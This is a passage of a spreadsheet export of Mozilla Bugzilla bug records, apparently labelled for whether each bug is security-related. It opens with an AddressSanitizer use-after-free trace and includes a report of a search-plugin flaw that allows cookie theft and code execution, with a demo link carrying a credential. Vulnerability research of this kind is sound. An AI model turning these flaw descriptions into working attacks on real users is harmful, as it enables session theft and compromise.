    #2 0x7fec675e5be8 in PrepareEditorEvent::Run() content/html/content/src/nsTextEditorState.cpp:1029
    #3 0x7fec6623b72c in nsContentUtils::RemoveScriptBlocker() content/base/src/nsContentUtils.cpp:5015
    #4 0x7fec646d13de in ~nsAutoScriptBlocker ../../../../dist/include/nsContentUtils.h:2332
    #5 0x7fec646bcb26 in ~nsAutoScriptBlocker ../../../../dist/include/nsContentUtils.h:2331
    #6 0x7fec64ae1ce2 in PresShell::FlushPendingNotifications(mozFlushType) layout/base/nsPresShell.cpp:3857
    #7 0x7fec6522c622 in nsHideViewer::Run() layout/generic/nsSubDocumentFrame.cpp:775
    #8 0x7fec6623b72c in nsContentUtils::RemoveScriptBlocker() content/base/src/nsContentUtils.cpp:5015
    #9 0x7fec646d13de in ~nsAutoScriptBlocker ../../../../dist/include/nsContentUtils.h:2332
    #10 0x7fec646bcb26 in ~nsAutoScriptBlocker ../../../../dist/include/nsContentUtils.h:2331
    #11 0x7fec6646a7c2 in nsDocument::AdoptNode(nsIDOMNode*, nsIDOMNode**) content/base/src/nsDocument.cpp:5957
    #12 0x7fec6bec6081 in nsIDOMDocument_AdoptNode(JSContext*, unsigned int, JS::Value*) objdir-ff-asan-sym/js/xpconnect/src/dom_quickstubs.cpp:1391
    #13 0x7fec77ff04e9 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) js/src/jscntxtinlines.h:364
    #14 0x7fec77fa00e1 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) js/src/jsinterp.cpp:2369
    #15 0x7fec77efef8e in js::RunScript(JSContext*, JS::Handle&lt;JSScript*&gt;, js::StackFrame*) js/src/jsinterp.cpp:324
    #16 0x7fec77ffdced in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::StackFrame*, JS::Value*) js/src/jsinterp.cpp:510
    #17 0x7fec77fff97b in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) js/src/jsinterp.cpp:547
    #18 0x7fec7771447d in JS::Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions, unsigned short const*, unsigned long, JS::Value*) js/src/jsapi.cpp:5703
    #19 0x7fec689cdf10 in nsJSContext::EvaluateString(nsAString_internal const&amp;, JSObject*, nsIPrincipal*, nsIPrincipal*, char const*, unsigned int, JSVersion, nsAString_internal*, bool*) dom/base/nsJSEnvironment.cpp:1499
    #20 0x7fec68b8fb06 in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) dom/base/nsGlobalWindow.cpp:9740
    #21 0x7fec68b43d84 in nsGlobalWindow::RunTimeout(nsTimeout*) dom/base/nsGlobalWindow.cpp:9999
    #22 0x7fec68b8d9b8 in nsGlobalWindow::TimerCallback(nsITimer*, void*) dom/base/nsGlobalWindow.cpp:10266
    #23 0x7fec70b33762 in nsTimerImpl::Fire() xpcom/threads/nsTimerImpl.cpp:472
    #24 0x7fec70b34c6a in nsTimerEvent::Run() xpcom/threads/nsTimerImpl.cpp:555
    #25 0x7fec70af70c6 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:620
    #26 0x7fec7077746b in NS_ProcessNextEvent_P(nsIThread*, bool) objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
    #27 0x7fec6f04e446 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:82
    #28 0x7fec70dd83e1 in MessageLoop::RunInternal() ipc/chromium/src/base/message_loop.cc:215
    #29 0x7fec70dd8216 in MessageLoop::RunHandler() ipc/chromium/src/base/message_loop.cc:208
    #30 0x7fec70dd80fb in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:182
    #31 0x7fec6e463c8a in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:163
    #32 0x7fec6cff4ab4 in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:290
    #33 0x7fec628d83e8 in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:3799
    #34 0x7fec628de2cb in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:3866
    #35 0x7fec628e11c4 in XRE_main toolkit/xre/nsAppRunner.cpp:3941
    #36 0x40c055 in do_main(int, char**) browser/app/nsBrowserApp.cpp:174
    #37 0x409757 in main browser/app/nsBrowserApp.cpp:279
    #38 0x7fec81f6376c in ?? ??:0
0x7fec4cb70a60 is located 32 bytes inside of 128-byte region [0x7fec4cb70a40,0x7fec4cb70ac0)
freed by thread T0 here:
    #0 0x4c3d50 in __interceptor_free ??:?
    #1 0x7fec7fce0406 in moz_free memory/mozalloc/mozalloc.cpp:48
    #2 0x7fec6796dc86 in operator delete(void*) ../../../../dist/include/mozilla/mozalloc.h:224
    #3 0x7fec6797cf99 in nsHTMLInputElement::HandleTypeChange(unsigned char) content/html/content/src/nsHTMLInputElement.cpp:2628
    #4 0x7fec679b1fd4 in nsHTMLInputElement::ParseAttribute(int, nsIAtom*, nsAString_internal const&amp;, nsAttrValue&amp;) content/html/content/src/nsHTMLInputElement.cpp:2758
    #5 0x7fec6666d1d9 in nsGenericElement::SetAttr(int, nsIAtom*, nsIAtom*, nsAString_internal const&amp;, bool) content/base/src/nsGenericElement.cpp:1954
    #6 0x7fec67538abd in nsGenericHTMLElement::SetAttr(int, nsIAtom*, nsIAtom*, nsAString_internal const&amp;, bool) content/html/content/src/nsGenericHTMLElement.cpp:2002
    #7 0x7fec6751c823 in nsGenericHTMLElement::SetAttr(int, nsIAtom*, nsAString_internal const&amp;, bool) content/html/document/src/../../content/src/nsGenericHTMLElement.h:245
    #8 0x7fec6751ec27 in nsGenericHTMLElement::SetAttrHelper(nsIAtom*, nsAString_internal const&amp;) content/html/content/src/nsGenericHTMLElement.cpp:2871
    #9 0x7fec6798c820 in nsHTMLInputElement::SetType(nsAString_internal const&amp;) content/html/content/src/nsHTMLInputElement.cpp:905
    #10 0x7fec6798c982 in non-virtual thunk to nsHTMLInputElement::SetType(nsAString_internal const&amp;) :?
    #11 0x7fec6c4e71c1 in nsIDOMHTMLInputElement_SetType(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;long&gt;, int, JS::MutableHandle&lt;JS::Value&gt;) objdir-ff-asan-sym/js/xpconnect/src/dom_quickstubs.cpp:13483
    #12 0x7fec782d5d65 in js::CallJSPropertyOpSetter(JSContext*, int (*)(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;long&gt;, int, JS::MutableHandle&lt;JS::Value&gt;), JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;long&gt;, int, JS::MutableHandle&lt;JS::Value&gt;) js/src/jscntxtinlines.h:450
    #13 0x7fec7830c326 in js::baseops::SetPropertyHelper(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;long&gt;, unsigned int, JS::MutableHandle&lt;JS::Value&gt;, int) js/src/jsobj.cpp:4613
    #14 0x7fec78037376 in js::SetPropertyOperation(JSContext*, unsigned char*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;) js/src/jsinterpinlines.h:362
previously allocated by thread T0 here:
    #0 0x4c3e10 in malloc ??:?
    #1 0x7fec7fce055a in moz_xmalloc memory/mozalloc/mozalloc.cpp:54
    #2 0x7fec6796c7aa in operator new(unsigned long) ../../../../dist/include/mozilla/mozalloc.h:200
    #3 0x7fec6796b520 in NS_NewHTMLInputElement(already_AddRefed&lt;nsINodeInfo&gt;, mozilla::dom::FromParser) content/html/content/src/nsHTMLInputElement.cpp:538
    #4 0x7fec68144d2f in CreateHTMLElement(unsigned int, already_AddRefed&lt;nsINodeInfo&gt;, mozilla::dom::FromParser) content/html/document/src/nsHTMLContentSink.cpp:497
    #5 0x7fec6814558a in NS_NewHTMLElement(nsIContent**, already_AddRefed&lt;nsINodeInfo&gt;, mozilla::dom::FromParser) content/html/document/src/nsHTMLContentSink.cpp:480
    #6 0x7fec667460f1 in NS_NewElement(nsIContent**, already_AddRefed&lt;nsINodeInfo&gt;, mozilla::dom::FromParser) content/base/src/nsNameSpaceManager.cpp:201
    #7 0x7fec69ddd666 in nsHtml5TreeOperation::Perform(nsHtml5TreeOpExecutor*, nsIContent**) parser/html/nsHtml5TreeOperation.cpp:345
    #8 0x7fec69dfe22b in nsHtml5TreeOpExecutor::RunFlushLoop() parser/html/nsHtml5TreeOpExecutor.cpp:564
Shadow byte and word:
  0x1ffd8996e14c: fd
  0x1ffd8996e148: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1ffd8996e128: 00 00 00 00 00 00 00 00
  0x1ffd8996e130: 00 00 00 00 00 00 00 00
  0x1ffd8996e138: fa fa fa fa fa fa fa fa
  0x1ffd8996e140: fa fa fa fa fa fa fa fa
=&gt;0x1ffd8996e148: fd fd fd fd fd fd fd fd
  0x1ffd8996e150: fd fd fd fd fd fd fd fd
  0x1ffd8996e158: fa fa fa fa fa fa fa fa
  0x1ffd8996e160: fa fa fa fa fa fa fa fa
  0x1ffd8996e168: 00 00 00 00 00 00 00 00
Stats: 239M malloced (227M for red zones) by 420825 calls
Stats: 43M realloced by 17471 calls
Stats: 201M freed by 199819 calls
Stats: 163M really freed by 165412 calls
Stats: 248M (63708 full pages) mmaped in 474 calls
  mmaps   by size class: 7:200655; 8:45034; 9:12276; 10:4599; 11:8670; 12:1152; 13:704; 14:544; 15:144; 16:616; 17:452; 18:112; 19:35; 20:21;
  mallocs by size class: 7:289609; 8:78837; 9:21511; 10:7139; 11:15529; 12:2157; 13:1652; 14:1478; 15:316; 16:1063; 17:1326; 18:146; 19:40; 20:22;
  frees   by size class: 7:111546; 8:49507; 9:15454; 10:4185; 11:12566; 12:1338; 13:1217; 14:1311; 15:263; 16:1015; 17:1310; 18:51; 19:37; 20:19;
  rfrees  by size class: 7:94468; 8:41302; 9:9580; 10:2979; 11:11409; 12:1056; 13:983; 14:1225; 15:217; 16:860; 17:1278; 18:49; 19:5; 20:1;
Stats: malloc large: 2913 small slow: 4736
==20748== ABORTING</t>
        </is>
      </c>
      <c r="X4467" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4468">
      <c r="A4468" t="n">
        <v>1338161</v>
      </c>
      <c r="B4468" t="inlineStr">
        <is>
          <t>2017-02-09 07:00:44 -0800</t>
        </is>
      </c>
      <c r="C4468" t="inlineStr">
        <is>
          <t>release runner decision task for relgraph 1 for fennec</t>
        </is>
      </c>
      <c r="D4468" t="inlineStr">
        <is>
          <t>2017-03-01 07:36:43 -0800</t>
        </is>
      </c>
      <c r="E4468" t="n">
        <v>1</v>
      </c>
      <c r="F4468" t="n">
        <v>1</v>
      </c>
      <c r="G4468" t="n">
        <v>5</v>
      </c>
      <c r="H4468" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4468" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4468" t="inlineStr">
        <is>
          <t>Release Automation: Other</t>
        </is>
      </c>
      <c r="K4468" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4468" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4468" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4468" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4468" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4468" t="inlineStr"/>
      <c r="Q4468" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4468" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4468" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4468" t="n">
        <v>1</v>
      </c>
      <c r="U4468" t="n">
        <v>0</v>
      </c>
      <c r="V4468" t="n">
        <v>4</v>
      </c>
      <c r="W4468" t="inlineStr">
        <is>
          <t>add a release runner decision task to releasetasks like we have for firefox, but for fennec</t>
        </is>
      </c>
      <c r="X4468" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4469">
      <c r="A4469" t="n">
        <v>1548966</v>
      </c>
      <c r="B4469" t="inlineStr">
        <is>
          <t>2019-05-03 16:45:17 -0700</t>
        </is>
      </c>
      <c r="C4469" t="inlineStr">
        <is>
          <t>Update IPC peers for the prevent_sync_ipc_changes commit hook</t>
        </is>
      </c>
      <c r="D4469" t="inlineStr">
        <is>
          <t>2022-03-15 13:42:48 -0700</t>
        </is>
      </c>
      <c r="E4469" t="n">
        <v>1</v>
      </c>
      <c r="F4469" t="n">
        <v>1</v>
      </c>
      <c r="G4469" t="n">
        <v>5</v>
      </c>
      <c r="H4469" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4469" t="inlineStr">
        <is>
          <t>Developer Services</t>
        </is>
      </c>
      <c r="J4469" t="inlineStr">
        <is>
          <t>Mercurial: hg.mozilla.org</t>
        </is>
      </c>
      <c r="K4469" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4469" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4469" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4469" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4469" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4469" t="inlineStr"/>
      <c r="Q4469" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4469" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4469" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4469" t="n">
        <v>1</v>
      </c>
      <c r="U4469" t="n">
        <v>0</v>
      </c>
      <c r="V4469" t="n">
        <v>3</v>
      </c>
      <c r="W4469" t="inlineStr">
        <is>
          <t>There have been some changes to the IPC peers since the last time the `prevent_sync_ipc_changes` commit hook was updated; also, my name is misspelled.
I have a patch, and I'm working on getting things set up to test it.</t>
        </is>
      </c>
      <c r="X4469" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4470">
      <c r="A4470" t="n">
        <v>1594948</v>
      </c>
      <c r="B4470" t="inlineStr">
        <is>
          <t>2019-11-07 16:26:38 -0800</t>
        </is>
      </c>
      <c r="C4470" t="inlineStr">
        <is>
          <t>[Experiment] Staged Rollout: Gradual rollout of &lt;meta viewport&gt; support in RDM Fx 72.0 to 72.0 Release</t>
        </is>
      </c>
      <c r="D4470" t="inlineStr">
        <is>
          <t>2020-09-15 09:40:21 -0700</t>
        </is>
      </c>
      <c r="E4470" t="n">
        <v>1</v>
      </c>
      <c r="F4470" t="n">
        <v>1</v>
      </c>
      <c r="G4470" t="n">
        <v>5</v>
      </c>
      <c r="H4470" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4470" t="inlineStr">
        <is>
          <t>Shield</t>
        </is>
      </c>
      <c r="J4470" t="inlineStr">
        <is>
          <t>Shield Study</t>
        </is>
      </c>
      <c r="K4470" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4470" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4470" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4470" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4470" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4470" t="inlineStr"/>
      <c r="Q4470" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4470" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4470" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4470" t="n">
        <v>1</v>
      </c>
      <c r="U4470" t="n">
        <v>0</v>
      </c>
      <c r="V4470" t="n">
        <v>3</v>
      </c>
      <c r="W4470" t="inlineStr">
        <is>
          <t>Gradual rollout of &lt;meta viewport&gt; support in RDM
&lt;meta viewport&gt; tags make webpages adapt nicely to mobile device viewports.
RDM is our desktop-based tool to simulate mobile devices. It is very important to web developers since they spend most of their time developing and debugging on desktop browsers before testing on actual devices.
Bug 1521921 is the meta bug that tracks the proper handling of &lt;meta viewport&gt; in RDM.
Once all of the bugs we track in the MVP for this project are done, we want to ship this new feature to our user base.
We would like to do a gradual rollout of this feature in release to ensure stability before enabling this to the entire population.
Proper handling of this feature is difficult, and we want to test the waters before enabling the feature to everybody.
Originally filed as a bug: https://bugzilla.mozilla.org/show_bug.cgi?id=1580419
- Start date: When Firefox 72 hits release.
- People:
        Product Manager: Martin Balfanz
        Engineering Manager: Patrick Brosset
        Engineer: Brad Werth
- Target audience:
        Minimum Firefox Version: Firefox 72
        Language: All
        Platform (Windows, Mac, Linux): All
        Region: All
- FeatureGate: NO
- Pref to flip: devtools.responsive.metaViewport.enabled
        BEFORE: false
        AFTER: true
This feature is toggleable at runtime with the pref mentioned before. It does not need a restart.
How will we check for success? Unfortunately, there is no telemetry probe or crash rates we can check. The problems we expect are visual. Websites rendered in the RDM viewport might not be zoomed in, or panned, or centered correctly. Only the users will know if RDM truthfully renders their sites like on mobile devices. We therefore intend to rely on incoming bug traffic to decide whether we should continue with the rollout or turn the feature off.
In terms of playbook, this is probably a lower risk one. At least at this point in time, we are not aware of webcompat or stability problems. We will know more in beta 71 (where QA will perform a new test run).
Experimenter is the source of truth for details and delivery. Changes to Bugzilla are not reflected in Experimenter and will not change delivery configuration.
More information: https://experimenter.services.mozilla.com/experiments/gradual-rollout-of-meta-viewport-support-in-rdm/</t>
        </is>
      </c>
      <c r="X4470" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4471">
      <c r="A4471" t="n">
        <v>43223</v>
      </c>
      <c r="B4471" t="inlineStr">
        <is>
          <t>2000-06-20 15:53:17 -0700</t>
        </is>
      </c>
      <c r="C4471" t="inlineStr">
        <is>
          <t>Can't save prefs after going from Fonts panel to another</t>
        </is>
      </c>
      <c r="D4471" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E4471" t="n">
        <v>1</v>
      </c>
      <c r="F4471" t="n">
        <v>1</v>
      </c>
      <c r="G4471" t="n">
        <v>2</v>
      </c>
      <c r="H4471" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4471" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J4471" t="inlineStr">
        <is>
          <t>Preferences</t>
        </is>
      </c>
      <c r="K4471" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4471" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4471" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4471" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4471" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4471" t="inlineStr">
        <is>
          <t>[nsbeta2+]</t>
        </is>
      </c>
      <c r="Q4471" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4471" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4471" t="inlineStr">
        <is>
          <t>M18</t>
        </is>
      </c>
      <c r="T4471" t="n">
        <v>1</v>
      </c>
      <c r="U4471" t="n">
        <v>0</v>
      </c>
      <c r="V4471" t="n">
        <v>21</v>
      </c>
      <c r="W4471" t="inlineStr">
        <is>
          <t>prefs wouldn't save due to an error in pref-fonts.js line 177 - it didn't like
dataobject.
JavaScript error: 
chrome://communicator/content/pref/pref-fonts.js line 177: dataObject has no
properties</t>
        </is>
      </c>
      <c r="X4471" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4472">
      <c r="A4472" t="n">
        <v>1320916</v>
      </c>
      <c r="B4472" t="inlineStr">
        <is>
          <t>2016-11-29 04:46:17 -0800</t>
        </is>
      </c>
      <c r="C4472" t="inlineStr">
        <is>
          <t>Differences in the commit tables between environments</t>
        </is>
      </c>
      <c r="D4472" t="inlineStr">
        <is>
          <t>2016-11-29 13:06:19 -0800</t>
        </is>
      </c>
      <c r="E4472" t="n">
        <v>1</v>
      </c>
      <c r="F4472" t="n">
        <v>1</v>
      </c>
      <c r="G4472" t="n">
        <v>7</v>
      </c>
      <c r="H4472" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4472" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J4472" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K4472" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4472" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4472" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4472" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4472" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4472" t="inlineStr"/>
      <c r="Q4472" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4472" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4472" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4472" t="n">
        <v>1</v>
      </c>
      <c r="U4472" t="n">
        <v>0</v>
      </c>
      <c r="V4472" t="n">
        <v>3</v>
      </c>
      <c r="W4472" t="inlineStr">
        <is>
          <t>It looks like an index on `revision` was manually added to prod, but not reflected in the model. 
Will, should we:
(a) add it to the model too
(b) drop the index on prod
I'm fine with deprecating searching by commit revision fwiw (and only allowing searching by push revision).
--- vagrant.sql	2016-11-25 17:22:53.439965200 +0000
+++ prod.sql	2016-11-25 17:31:49.775087600 +0000
...
 --
 -- Table structure for table `commit`
 --
 DROP TABLE IF EXISTS `commit`;
 /*!40101 SET @saved_cs_client     = @@character_set_client */;
 /*!40101 SET character_set_client = utf8 */;
 CREATE TABLE `commit` (
   `id` int(11) NOT NULL AUTO_INCREMENT,
   `revision` varchar(40) COLLATE utf8_bin NOT NULL,
   `author` varchar(150) COLLATE utf8_bin NOT NULL,
   `comments` longtext COLLATE utf8_bin NOT NULL,
   `push_id` int(11) NOT NULL,
   PRIMARY KEY (`id`),
   UNIQUE KEY `&lt;INDEX_NAME&gt;` (`push_id`,`revision`),
   KEY `&lt;INDEX_NAME&gt;` (`push_id`),
+  KEY `&lt;INDEX_NAME&gt;` (`revision`),
   CONSTRAINT `&lt;INDEX_NAME&gt;` FOREIGN KEY (`push_id`) REFERENCES `push` (`id`)
 ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_bin;
 /*!40101 SET character_set_client = @saved_cs_client */;</t>
        </is>
      </c>
      <c r="X4472" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4473">
      <c r="A4473" t="n">
        <v>290037</v>
      </c>
      <c r="B4473" t="inlineStr">
        <is>
          <t>2005-04-12 04:46:57 -0700</t>
        </is>
      </c>
      <c r="C4473" t="inlineStr">
        <is>
          <t>Search plugins can get javascript access to currently active tab</t>
        </is>
      </c>
      <c r="D4473" t="inlineStr">
        <is>
          <t>2008-07-31 04:30:00 -0700</t>
        </is>
      </c>
      <c r="E4473" t="n">
        <v>1</v>
      </c>
      <c r="F4473" t="n">
        <v>1</v>
      </c>
      <c r="G4473" t="n">
        <v>2</v>
      </c>
      <c r="H4473" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4473" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J4473" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K4473" t="inlineStr">
        <is>
          <t>1.7 Branch</t>
        </is>
      </c>
      <c r="L4473" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4473" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4473" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4473" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4473" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q4473" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4473" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4473" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4473" t="n">
        <v>1</v>
      </c>
      <c r="U4473" t="n">
        <v>0</v>
      </c>
      <c r="V4473" t="n">
        <v>13</v>
      </c>
      <c r="W4473" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050408 Firefox/1.0.3
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050408 Firefox/1.0.3
By creating a special sherlock file it is possible to run javascript code in the
security context of the currently active tab. This allows to create search
engines that silently monitor all website displayed while searching (e.g. to
steal sessions cookies) and/or that wait for a privileged page (e.g. chrome or
about:config) to run arbitrary code.  
Reproducible: Always
Steps to Reproduce:
1. Open http://bugzilla:Je5Zw8k@www.mikx.de/firesearching/
2. Follow instructions
The demo adds a new search engine (called Firesearching) by calling
sidebar.addSearchEngine() that behaves like a normal Google search. When
searching with that engine an alert shows that the engine has javascript access
to the currently active tab. An attacker could silently send the information to
another host instead. 
When the currently displayed site is privileged (chrome or about:config) the
demo requests UniversalXPConnect rights, creates c:\booom.bat and launches the
batch file (shows a directoy listing in a dos box). This part is Windows only,
which is a limitation of the demo - the bug affects all platforms.</t>
        </is>
      </c>
      <c r="X4473" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4474">
      <c r="A4474" t="n">
        <v>493488</v>
      </c>
      <c r="B4474" t="inlineStr">
        <is>
          <t>2009-05-17 16:35:45 -0700</t>
        </is>
      </c>
      <c r="C4474" t="inlineStr">
        <is>
          <t>Try server talos failing to download some mac builds</t>
        </is>
      </c>
      <c r="D4474" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4474" t="n">
        <v>1</v>
      </c>
      <c r="F4474" t="n">
        <v>1</v>
      </c>
      <c r="G4474" t="n">
        <v>5</v>
      </c>
      <c r="H4474" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4474" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4474" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4474" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4474" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4474" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4474" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4474" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4474" t="inlineStr"/>
      <c r="Q4474" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4474" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4474" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4474" t="n">
        <v>1</v>
      </c>
      <c r="U4474" t="n">
        <v>0</v>
      </c>
      <c r="V4474" t="n">
        <v>8</v>
      </c>
      <c r="W4474" t="inlineStr">
        <is>
          <t>[nthomas@dm-wwwbuild01]$ find /builds/tryserver -type f -perm 600
/builds/tryserver/bhearsum@mozilla.com-bentest191/bentest191-macosx.dmg
/builds/tryserver/ibukanov@mozilla.com-private_493457/private_493457-macosx.dmg
/builds/tryserver/bhearsum@mozilla.com-try-3a38eb1d96c/try-3a38eb1d96c-macosx.dmg
/builds/tryserver/pvanderbeken@mozilla.com-try-456455311bf/try-456455311bf-macosx.dmg
/builds/tryserver/opettay@mozilla.com-mouse_and_key_queue/mouse_and_key_queue-macosx.dmg
/builds/tryserver/opettay@mozilla.com-currenttarget_opt/currenttarget_opt-macosx.dmg
Which leads to 
wget -nv -N --no-check-certificate http://build.mozilla.org/tryserver-builds/ibukanov@mozilla.com-private_493457/private_493457-macosx.dmg
WARNING: Certificate verification error for build.mozilla.org: self signed certificate in certificate chain
https://build.mozilla.org/tryserver-builds/ibukanov@mozilla.com-private_493457/private_493457-macosx.dmg:
12:33:25 ERROR 403: Forbidden.
Tracking down which macs are responsible.</t>
        </is>
      </c>
      <c r="X4474" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4475">
      <c r="A4475" t="n">
        <v>283403</v>
      </c>
      <c r="B4475" t="inlineStr">
        <is>
          <t>2005-02-23 18:54:48 -0800</t>
        </is>
      </c>
      <c r="C4475" t="inlineStr">
        <is>
          <t>checksetup fails to upgrade from Bugzilla 2.8</t>
        </is>
      </c>
      <c r="D4475" t="inlineStr">
        <is>
          <t>2005-03-27 20:19:27 -0800</t>
        </is>
      </c>
      <c r="E4475" t="n">
        <v>1</v>
      </c>
      <c r="F4475" t="n">
        <v>1</v>
      </c>
